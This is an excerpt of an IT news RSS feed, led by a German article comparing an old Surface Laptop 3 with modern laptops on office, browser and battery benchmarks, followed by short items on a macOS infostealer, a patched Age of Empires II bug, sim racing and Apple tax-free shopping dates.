				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption">Der ältere Laptop startete am schnellsten.</figcaption></figure></div>



<p>Die Ergebnisse meines Tests haben mich überrascht: Der Surface Laptop 3, auf dem eine Standardversion von Windows 11 24H2 (26100.8328) lief, startete deutlich schneller als die anderen vier Laptops. Warum auf einmal vier Laptops? Um meine Ergebnisse besser bewerten zu können, habe ich zwei etwas ältere Geräte hinzugefügt. Dabei stellte sich heraus, dass auch diese Geräte recht lange für den Startvorgang benötigten.</p>



<p>Kurz gesagt: Der Surface Laptop 3 aus dem Jahr 2019 startete etwa 10 Sekunden schneller als seine modernen Konkurrenten. Entsprechend gespannt war ich auf die weiteren Tests.</p>



<h2 class="wp-block-heading toc">Die alltägliche Windows-Nutzung</h2>



<p>Auch hier habe ich versucht, synthetische Benchmarks zu vermeiden. Diesen Zahlen fehlt oft der Bezug zur alltäglichen Nutzung. Stattdessen habe ich etwa 30 Tabs im Browser geöffnet und zwischen diesen hin und her geklickt. Ich habe außerdem mit allen drei Laptops gearbeitet und sogar Teile dieses Artikels auf den Geräten verfasst.</p>



<p>Subjektiv gesehen spürt man tatsächlich einen Unterschied. Der von mir getestete Surface Laptop 3 verfügt über 16 Gigabyte RAM. Das Hin- und Herwechseln sowie das Starten von Apps fühlten sich langsamer an als bei den modernen Laptops. Der Unterschied war aber nicht sehr groß. Auch das Starten von Apps oder die Interaktion mit Windows fühlten sich merklich verzögert an. Dennoch konnte ich damit gut leben.</p>



<p>Oft liegt die träge Reaktion einfach an niedrigeren Spezifikationen. So gab es den Surface Laptop 3 auch mit nur 8 Gigabyte RAM. Davon würde ich heute eher abraten. Die nur 256 Gigabyte kleine SSD hat mich ebenfalls vor Probleme gestellt. Schon der Versuch, Windows wieder sauber zurückzusetzen, scheiterte am fehlenden Speicherplatz. Doch ich hatte letztlich nur einige versteckte Videodateien übersehen.</p>



<p>Generell fordern die meisten Funktionen des Betriebssystems oft nur einen Kern des Prozessors. Diese Leistung habe ich mit Cinebench gemessen. Je niedriger der erreichte Wert ist, desto langsamer fühlt sich Windows im Alltag an.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a58b2f75e0a2"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/05/image_7e8877.png?w=1200" alt="" class="wp-image-3141110" width="1200" height="583" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure></div>



<p>Auch hier fühlte sich die Interaktion mit Webseiten auf dem älteren Laptop etwas langsam und ruckelig an. Wirklich gestört hat mich dies aber nicht. </p>



<p>Ihr Browser verarbeitet im Hintergrund mehrere APIs, Frameworks und andere Anweisungen, die von außen kaum sichtbar sind. Um zu bewerten, wie gut der Laptop diese Aufgaben verarbeitet, haben wir zwei weitere Benchmarks durchgeführt: Speedometer und MotionMark sollen zeigen, wie flüssig der Browser arbeitet.</p>



<p>In diesem Fall rendern die neuen Laptops ihre Ergebnisse etwa doppelt so schnell wie der ältere Laptop. Subjektiv gesehen ist das kein riesiger Unterschied – aber es macht sich im Alltag bemerkbar.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a58b2f75e5f0"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/05/image_0315c6.png?w=1200" alt="" class="wp-image-3141111" width="1200" height="713" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure></div>



<p>Diese abstrakten Zahlen sollen verdeutlichen, welche Unterschiede es zwischen den Geräten gibt. Viel nützlicher sind aber die folgenden Vergleiche aus dem Alltag.</p>



<h2 class="wp-block-heading toc">Büroarbeit offenbart Schwächen</h2>



<p>Die Anwendungen PCMark und Procyon von UL messen die Leistung in Word, Excel oder PowerPoint und nutzen das klassische Outlook für einige zusätzliche Tests im Office-Produktivitäts-Benchmark. Das Ergebnis ist eine Punktzahl, die ich in der folgenden Tabelle aufgelistet habe. Es wird jedoch auch die tatsächliche Zeit erfasst, die für bestimmte Aufgaben benötigt wird. So zeichnen sich die tatsächlichen Unterschiede zwischen den älteren und neueren Laptops deutlicher ab. Die durchschnittliche Punktzahl des Surface Laptop 3 war nur etwa halb so hoch wie die des Asus ZenBook Duo und des Asus ZenBook mit Snapdragon-X2E-Prozessor.</p>



<p>Die Grafik unten offenbart jedoch den eigentlichen Grund, warum ich diesen Artikel überhaupt geschrieben habe: Der Procyon-Benchmark von UL misst tatsächlich die Zeit, die für das Erledigen einer bestimmten Aufgabe nötig war. Der Test liefert so einen realistischen Vergleich darüber, wie schnell die jeweilige Laptop-Generation wirklich war.</p>



<p>Einige Aufgaben waren schnell erledigt: Können Sie es in Kauf nehmen, dass das Hinzufügen eines Wasserzeichens auf dem alten Laptop 0,9 Sekunden dauert, gegenüber 0,36 Sekunden beim neuen Gerät? Wahrscheinlich. Wie sieht es mit 2 Sekunden anstelle von einer Sekunde für das Hinzufügen eines Bildes aus? Und wie wäre es mit 26 Sekunden zum Exportieren einer PDF-Datei, gegenüber 11 Sekunden? Überlegen Sie, wie oft Sie diese Aufgaben ausführen und wie lange Sie auf das Ergebnis warten müssten.</p>



<p>Ein Blick auf Excel: Das Formatieren einer Tabelle dauerte auf dem Surface Laptop 3 fast drei Sekunden, gegenüber 0,4 Sekunden beim Asus-Laptop mit Snapdragon-Prozessor. Wenn Sie regelmäßig in Excel arbeiten, könnte diese kleine Verzögerung stören. Oder vier Sekunden zum Kopieren und Einfügen gegenüber sieben? Manche Menschen werden sich daran stören. Andere nicht.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a58b2f75ec26"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/05/Procyon-Office-test-7-year-old-PC-all-threee.png?w=1115" alt="Seven-year-old PC Panther Lake v Snapdragon X2 Elite and Surface Laptop 3" class="wp-image-3141114" width="1115" height="1200" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption">Procyons Office-Produktivitäts-Benchmark mit einzelnen Ergebnissen. </figcaption></figure><p class="imageCredit">Mark Hachman / Foundry</p></div>



<h2 class="wp-block-heading toc">Videoanrufe, 30 Browser-Tabs und die Grenzen alter Hardware</h2>



<p>Außerdem habe ich einen weiteren Benchmark durchgeführt, den neuen Essentials-Test von UL.</p>



<p>Essentials öffnet einen Video-Chat, lässt diesen dann über einen Browser mit 30 geöffneten Tabs laufen – und beginnt anschließend, verschiedene Apps zu öffnen und Aufgaben auszuführen. Dies entspricht einem typischen Arbeitsalltag. Dazu kommen Aufgaben wie das Komprimieren und Dekomprimieren von Dateien, das Navigieren in einem webbasierten CRM (Customer Relationship Management) sowie die Nutzung sozialer Medien.</p>



<p>Wie zuvor geht es darum, herauszufinden, ob diese Unterschiede im Alltag einen Unterschied machen. Wenn Sie darüber nachdenken, Ihrem alten Laptop die Treue zu halten, dann stellen Sie sich folgende Fragen: Werden Sie wirklich 30 Tabs gleichzeitig öffnen? Wenn ja, könnte dies ein Problem sein. Anstelle von 5,75 Sekunden für die Navigation in einem Online-CRM geht es auf einem neuen Gerät mit 1,2 Sekunden deutlich flotter. Unser Testlauf umfasst sogar einige KI-Aufgaben: Das Zusammenfassen eines Chats dauerte auf dem älteren Laptop satte 69 Sekunden, gegenüber 15 bis 18 Sekunden auf den neueren Modellen mit integrierten NPUs. Ist dies etwas, das Sie regelmäßig tun? Das Entpacken einer ZIP-Datei war auf einem neuen PC etwa fünfmal schneller geschafft. So etwas macht man aber auch nicht ständig.</p>



<h2 class="wp-block-heading toc">Erwarten Sie keine Wunder von der integrierten Grafikeinheit</h2>



<p>Ich habe Grafikfunktionen wie Gaming, Foto- und Videobearbeitung bewusst ausgelassen. Dieser Artikel wurde mit Blick auf Produktivität verfasst, und die beiden letztgenannten Kategorien sind nach wie vor eher spezialisierte Aufgaben. Wenn Sie jedoch die Grafikleistung beider Laptop-Generationen vergleichen, stellen moderne Laptops ihre Vorgänger deutlich in den Schatten. Das Asus ZenBook Duo bietet etwa die siebenfache Grafikleistung (7.666 gegenüber 990 Punkten im 3DMark Time Spy-Benchmark von UL). Und selbst ein Asus Vivobook S14 aus dem Jahr 2024 bietet mit einer Punktzahl von 4.209 die vierfache Performance.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a58b2f75f40b"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/05/7-year-old-laptop-Procyon-Essentials.png?w=1200" alt="7-year-old laptop Procyon Essentials" class="wp-image-3141116" width="1200" height="1018" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption">Die Ergebnisse des Procyons Essentials-Benchmarks.</figcaption></figure><p class="imageCredit">Mark Hachman / Foundry</p></div>



<h2 class="wp-block-heading toc">Die Akkulaufzeit ist offensichtlichster Grund für ein Upgrade</h2>



<p>Leider gibt es einen Bereich, in dem moderne Laptops einen erheblichen Vorteil gegenüber ihren älteren Kollegen bieten. Das ist die Akkulaufzeit.</p>



<p>Ich bin nicht überzeugt, dass sich ein moderner Laptop physisch so sehr von einem älteren Thin-and-Light-Modell unterscheidet. Moderne Laptops werden aus unterschiedlichen Materialien hergestellt – von leichteren bis hin zu strukturell robusteren –, doch die Gewichtsersparnis beträgt meist nur 500 Gramm.</p>



<p>Die Hersteller haben die Möglichkeit, diesen Platz mit zusätzlichen Akkuzellen zu füllen. Dadurch ist die Akkukapazität moderner Laptops in den vergangenen Jahren gestiegen. Ein Laptop wie das Asus ZenBook Duo enthält sowohl einen effizienten Panther-Lake-Chip als auch einen satten 99-Wattstunden-Akku.</p>



<p>Während die Akkulaufzeit des Surface Laptop 3 bei für die damalige Zeit soliden 10 Stunden lag, hielt das ZenBook Duo beachtliche 22 Stunden und 15 Minuten durch.</p>



<p>Und es kommt noch schlimmer. Akkus altern, daher hat der 45-Wattstunden-Akku im Surface Laptop 3 laut Windows in den vergangenen Jahren 70 Ladezyklen durchlaufen. Das hat die tatsächliche Kapazität bei voller Ladung auf 36,7 Wattstunden gesenkt, was einem Rückgang von 18 Prozent entspricht. So erreicht das Gerät nur noch eine geschätzte Laufzeit von 8 Stunden und 12 Minuten. Das ist gar nicht schlecht! Dennoch werden Sie bei der Arbeit nicht einen ganzen Tag lang mit diesem Akku auskommen. In unserem Ratgeber erklären wir Ihnen, <a href="https://www.pcwelt.de/article/1140340/laptop-richtig-laden-diese-fehler-sollten-sie-vermeiden.html" target="_blank" rel="noreferrer noopener">wie Sie Ihren Laptop richtig aufladen</a>, um dessen Kapazität so lange wie möglich zu erhalten.</p>



<p>Dennoch hat sich der Alltag in den letzten sieben Jahren stark verändert. <a href="https://www.pcwelt.de/article/1167895/vergleich-die-besten-powerbanks-im-test-4500-bis-30000-mah.html" target="_blank" rel="noreferrer noopener">Leistungsstarke Powerbanks</a> sind zur Massenware geworden. Ebenso sind Steckdosen in Flugzeugen, auf Flughäfen und in Konferenzzentren überall zu finden. Die Effizienz von Akkus hat sich ebenfalls weiterentwickelt.</p>



<h2 class="wp-block-heading toc">Sollten Sie Ihren alten Laptop ausmustern?</h2>



<p>Die Kurzform: Wenn Ihr älterer Laptop die täglich genutzten Apps noch schnell laden kann, das Gerät generell reaktionsschnell arbeitet, genug Akkuleistung für Ihren Arbeitsalltag bietet und noch genügend Speicherplatz zur Verfügung hat, dann müssen Sie das Gerät wahrscheinlich noch nicht ersetzen.</p>



<p>Ein neuer Laptop ist vor allem dann sinnvoll, wenn die Akkulaufzeit zu einem täglichen Problem wird. Auch wenn Sie regelmäßig bei rechenintensiven Aufgaben wie Fotobearbeitung, Videobearbeitung, KI-Tools, großen Tabellenkalkulationen oder Dateikomprimierung warten müssen. Oder aber Ihr Gerät stößt aufgrund von zu wenig RAM oder Speicherplatz an seine Grenzen. Für einfaches Surfen, Office-Arbeit, E-Mails, Videoanrufe und leichtes Multitasking kann ein gut gepflegter älterer Laptop immer noch gut genug sein – und ihn zu behalten, könnte die klügere Entscheidung sein.</p>



<h2 class="wp-block-heading toc">Widerstehen Sie den Versuchungen des Marketings</h2>



<p>Früher waren sechs oder sieben Jahre in der PC-Branche eine kleine Ewigkeit. 1989 brachte Intel den 486er mit 25 Megahertz auf den Markt; 1995 erreichte der Pentium Pro 200 Megahertz. Und heute? Noch vor etwa einem Jahr haben wir uns darüber beschwert, dass Intels aktuelle Arrow-Lake-Chips mit einer Taktfrequenz von bis zu 5,2 Gigahertz sogar weniger Leistung ablieferten als ihre Vorgänger.</p>



<p>Vielleicht haben Sie diesen Artikel gelesen und sich gedacht: Wen interessiert das schon? Eine halbe Sekunde macht im Alltag keinen Unterschied. Daher rate ich Ihnen: Ziehen Sie es in Betracht, Ihren alten Rechner zu behalten. Andere Nutzer sehen das vielleicht anders und konzentrieren sich auf all die Vorteile, die ein neuerer Laptop mit sich bringt.</p>



<p>Die IT-Branche möchte Ihnen aus verschiedenen Gründen neue Produkte verkaufen. Wenn Sie aber die Möglichkeit haben, einen alten und einen neuen Laptop zu vergleichen, dann sehen Sie schnell, ob sich eine Neuanschaffung lohnt. Genau darum ging es mir in diesem Artikel: Ich wollte Ihnen all die Informationen geben, die Sie benötigen, um eine klügere Entscheidung darüber zu treffen, ob Sie einen neuen Laptop kaufen sollten.</p>



<p>Wenn sich jedoch herausstellt, dass ihr aktueller Laptop an seine Grenzen stößt, dann finden Sie in unseren <a href="https://www.pcwelt.de/bestenlisten/laptops" target="_blank" rel="noreferrer noopener">Bestenlisten</a> die lohnenswertesten Modelle für jeden Geldbeutel. Suchen Sie nach einem <a href="https://www.pcwelt.de/article/1204273/die-besten-laptops-fuer-studenten-und-schueler-im-test.html" target="_blank" rel="noreferrer noopener">Laptop für Schüler oder Studenten</a>? Oder soll es lieber ein <a href="https://www.pcwelt.de/article/2504193/test-die-besten-gaming-laptops-unter-1200-euro.html" target="_blank" rel="noreferrer noopener">Gaming-Laptop für unter 1.200 Euro</a> sein? <a href="https://www.pcwelt.de/article/2215385/die-besten-laptops-test.html" target="_blank" rel="noreferrer noopener">Die besten Notebooks aller Klassen</a> haben wir ebenfalls einem Vergleich unterzogen.</p>



<p>In jedem Fall gilt: <a href="https://www.pcwelt.de/article/2639709/nicht-wegwerfen-fuenf-geniale-ideen-fuer-alte-notebook-laptops-weiternutzung.html" target="_blank" rel="noreferrer noopener">Werfen Sie Ihren alten Laptop bloß nicht weg, sondern machen Sie stattdessen das damit!</a></p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[What is a CrashStealer malware?]]></title>
<description><![CDATA[The CrashStealer was first observed in May, 2026 and is a type of information-stealing malware that explicitly targets Apple personal computers and laptops. Once a… The post What is a CrashStealer malware? appeared first on Panda Security Mediacenter. This article…
Read more →
The post What is a ...]]></description>
<link>https://tsecurity.de/de/3672674/it-security-nachrichten/what-is-a-crashstealer-malware/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3672674/it-security-nachrichten/what-is-a-crashstealer-malware/</guid>
<pubDate>Thu, 16 Jul 2026 09:37:20 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The CrashStealer was first observed in May, 2026 and is a type of information-stealing malware that explicitly targets Apple personal computers and laptops. Once a… The post What is a CrashStealer malware? appeared first on Panda Security Mediacenter. This article…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/what-is-a-crashstealer-malware/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/what-is-a-crashstealer-malware/">What is a CrashStealer malware?</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[HPR4684: Sim Racing on the cheap!]]></title>
<description><![CDATA[This show has been flagged as Clean by the host.


Thrustmaster TMX Force Feedback Pro Black Xbox One / Xbox Series X/S / PC




https://www.ebay.com/itm/157554569422




Dayton Audio DAEX25 Audio Exciter Pair - Sound Exciter Pair Audio Transducer - 5 Watts RMS, 8 Ohms Impedance - 2 Pack - Tu...]]></description>
<link>https://tsecurity.de/de/3672094/podcasts/hpr4684-sim-racing-on-the-cheap/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3672094/podcasts/hpr4684-sim-racing-on-the-cheap/</guid>
<pubDate>Thu, 16 Jul 2026 02:03:00 +0200</pubDate>
<category>🎥 Podcasts</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>This show has been flagged as Clean by the host.</p>

<p>
Thrustmaster TMX Force Feedback Pro Black Xbox One / Xbox Series X/S / PC</p>

<p>

<a href="https://www.ebay.com/itm/157554569422" rel="noopener noreferrer" target="_blank">
https://www.ebay.com/itm/157554569422</a>

</p>

<p>
Dayton Audio DAEX25 Audio Exciter Pair - Sound Exciter Pair Audio Transducer - 5 Watts RMS, 8 Ohms Impedance - 2 Pack - Turn Any Surface into a Speaker System</p>

<p>

<a href="https://www.amazon.com/dp/B001EYEM8C" rel="noopener noreferrer" target="_blank">
https://www.amazon.com/dp/B001EYEM8C</a>

</p>

<p>

<a href="https://www.simhubdash.com/" rel="noopener noreferrer" target="_blank">
https://www.simhubdash.com/</a>

</p>

<p>

<a href="https://www.accsetupcomparator.com/" rel="noopener noreferrer" target="_blank">
https://www.accsetupcomparator.com/ </a>

</p>

<p>

<a href="https://www.iracing.com/" rel="noopener noreferrer" target="_blank">
https://www.iracing.com/</a>
 ( they have buy 2 years get discount during holiday but still can't afford it .. )</p>

<p>

<a href="https://forza.net/horizon" rel="noopener noreferrer" target="_blank">
https://forza.net/horizon</a>

</p>

<p>

</p>

<p>
DiRT Rally 2.0 GOTY</p>

<p>

<a href="https://k4g.com/store?distribution%5B%5D=3&amp;q=DiRT%20Rally%202.0%20GOTY&amp;sort=price" rel="noopener noreferrer" target="_blank">
https://k4g.com/store?distribution[]=3&amp;q=DiRT%20Rally%202.0%20GOTY&amp;sort=price</a>

</p>

<p>

</p>

<p>
CrewChiefV4</p>

<p>

<a href="https://thecrewchief.org/" rel="noopener noreferrer" target="_blank">
https://thecrewchief.org/</a>

</p>

<p>

<a href="https://app.tracktitan.io/sessions/3ebbf63b-93de-4309-9a42-9311a745209d/20241228052252" rel="noopener noreferrer" target="_blank">
https://app.tracktitan.io/sessions/3ebbf63b-93de-4309-9a42-9311a745209d/20241228052252</a>

</p>

<p>

</p>

<p>
SUMMARY.</p>

<p>
User discusses sim racing challenges, costs, and setup tips.</p>

<p>
IDEAS.</p>

<ol>

<li>
 Sim racing requires time and investment.</li>

<li>
 I Racing is expensive with annual costs.</li>

<li>
 Set of Courses offers one-time payment.</li>

<li>
 Proper setup enhances sim racing experience.</li>

<li>
 Cable connections can complicate setup.</li>

<li>
 Upgrading hardware improves performance.</li>

<li>
 Arcade games like Forza offer casual play.</li>

<li>
 Realistic sim racing demands dedication.</li>

<li>
 License requirements vary between platforms.</li>

<li>
 Remote gaming systems save space.</li>

<li>
 Steering wheel upgrades improve smoothness.</li>

<li>
 Dedicated spaces optimize sim racing.</li>

<li>
 Balancing fun and realism is key.</li>

<li>
 Multi-launchers manage gaming platforms.</li>

<li>
 Hacked accounts may cause issues.</li>

<li>
 Monitoring hardware wear is important.</li>

<li>
 Shifting mechanisms enhance control.</li>

<li>
 Curved monitors improve immersion.</li>

<li>
 Time constraints affect sim racing participation.</li>

<li>
 Exploring multiple games adds variety.</li>

</ol>

<p>

</p>

<p>
RECOMMENDATIONS.</p>

<ol>

<li>
 Consider Set of Courses for a one-time payment.</li>

<li>
 Invest in a proper setup for serious sim racing.</li>

<li>
 Use a multi-launcher for managing games.</li>

<li>
 Upgrade hardware for smoother performance.</li>

<li>
 Buy specific tracks and cars to avoid costs.</li>

<li>
 Opt for a dedicated space for sim racing.</li>

<li>
 Check for license requirements before purchasing.</li>

<li>
 Remote into gaming systems to save space.</li>

<li>
 Replace plastic parts with bearings for smoother operation.</li>

<li>
 Use a 7-speed shifter for better control.</li>

<li>
 Avoid hacked accounts for reliability.</li>

<li>
 Purchase multiple accounts for different players.</li>

<li>
 Focus on arcade games for casual play.</li>

<li>
 Prioritize a curved monitor for immersion.</li>

<li>
 Use a standing desk for accessibility.</li>

<li>
 Monitor cable connections to prevent setup issues.</li>

<li>
 Upgrade steering wheel components for better experience.</li>

<li>
 Balance fun and realism based on personal preference.</li>

<li>
 Consider time investment for sim racing.</li>

<li>
 Explore different racing games for variety.</li>

</ol>

<p>

</p>


<p><a href="https://hackerpublicradio.org/eps/hpr4684/index.html#comments">Provide <strong>feedback</strong> on this episode</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Microsoft patches bug in video game Age of Empires II]]></title>
<description><![CDATA[The vulnerability in the decades-old game could have allowed hackers to take over victims’ computers with a malicious game invite. This article has been indexed from Security News | TechCrunch Read the original article: Microsoft patches bug in video game…
Read more →
The post Microsoft patches b...]]></description>
<link>https://tsecurity.de/de/3671687/it-security-nachrichten/microsoft-patches-bug-in-video-game-age-of-empires-ii/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671687/it-security-nachrichten/microsoft-patches-bug-in-video-game-age-of-empires-ii/</guid>
<pubDate>Wed, 15 Jul 2026 21:09:09 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The vulnerability in the decades-old game could have allowed hackers to take over victims’ computers with a malicious game invite. This article has been indexed from Security News | TechCrunch Read the original article: Microsoft patches bug in video game…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/microsoft-patches-bug-in-video-game-age-of-empires-ii/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/microsoft-patches-bug-in-video-game-age-of-empires-ii/">Microsoft patches bug in video game Age of Empires II</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Microsoft patches bug in video game Age of Empires II]]></title>
<description><![CDATA[The vulnerability in the decades-old game could have allowed hackers to take over victims’ computers with a malicious game invite.]]></description>
<link>https://tsecurity.de/de/3671652/it-security-nachrichten/microsoft-patches-bug-in-video-game-age-of-empires-ii/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671652/it-security-nachrichten/microsoft-patches-bug-in-video-game-age-of-empires-ii/</guid>
<pubDate>Wed, 15 Jul 2026 20:50:36 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The vulnerability in the decades-old game could have allowed hackers to take over victims’ computers with a malicious game invite.]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple Reveals 2026 Sales Tax Holiday Dates for 10 US States]]></title>
<description><![CDATA[Apple has published its 2026 sales tax holiday schedule, allowing customers in 10 US states to buy selected Apple products without paying state sales tax. Shoppers can use the offer online or at Apple Stores, although each state follows different dates, product rules, and price limits.



Apple 2...]]></description>
<link>https://tsecurity.de/de/3671551/ios-mac-os/apple-reveals-2026-sales-tax-holiday-dates-for-10-us-states/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671551/ios-mac-os/apple-reveals-2026-sales-tax-holiday-dates-for-10-us-states/</guid>
<pubDate>Wed, 15 Jul 2026 19:54:21 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple has published its 2026 sales tax holiday schedule, allowing customers in 10 US states to buy selected Apple products without paying state sales tax. Shoppers can use the offer online or at Apple Stores, although each state follows different dates, product rules, and price limits.



Apple 2026 Tax-Free Shopping Dates



The first sales tax holiday begins in Alabama from July 17 to July 19, while Florida offers the longest shopping period from July 20 through August 20.



Other dates include:




New Mexico and Tennessee: July 31 to August 2



West Virginia: July 31 to August 3



Arkansas: August 1 to August 2



Missouri, South Carolina, and Virginia: August 7 to August 9



Massachusetts: August 8 to August 9




Arkansas offers one of the widest exemptions, covering Macs, iPads, iPhones, Apple Vision Pro, printers, and selected accessories without a listed price limit.



Massachusetts allows most individual items priced at $2,500 or less, while Florida and Missouri limit qualifying computers and accessories to $1,500 per item.



Tennessee applies a $1,500 limit to the combined cost of a computer and eligible accessories, while New Mexico sets lower limits of $1,000 for computers and $500 for related hardware.



Apple advises customers to review local rules before ordering, since some accessories must support school use or come with a computer. Tax savings may appear only on the final receipt.]]></content:encoded>
</item>
<item>
<title><![CDATA[Steam fan finds 'cheap SSDs' to make retro 'game cartridges' system — the only problem is 2026 is the worst year in history to do it]]></title>
<description><![CDATA[PC physical copies could be a thing again, after this Steam gamer found a unique but expensive way to do it.]]></description>
<link>https://tsecurity.de/de/3671334/it-nachrichten/steam-fan-finds-cheap-ssds-to-make-retro-game-cartridges-system-the-only-problem-is-2026-is-the-worst-year-in-history-to-do-it/</link>
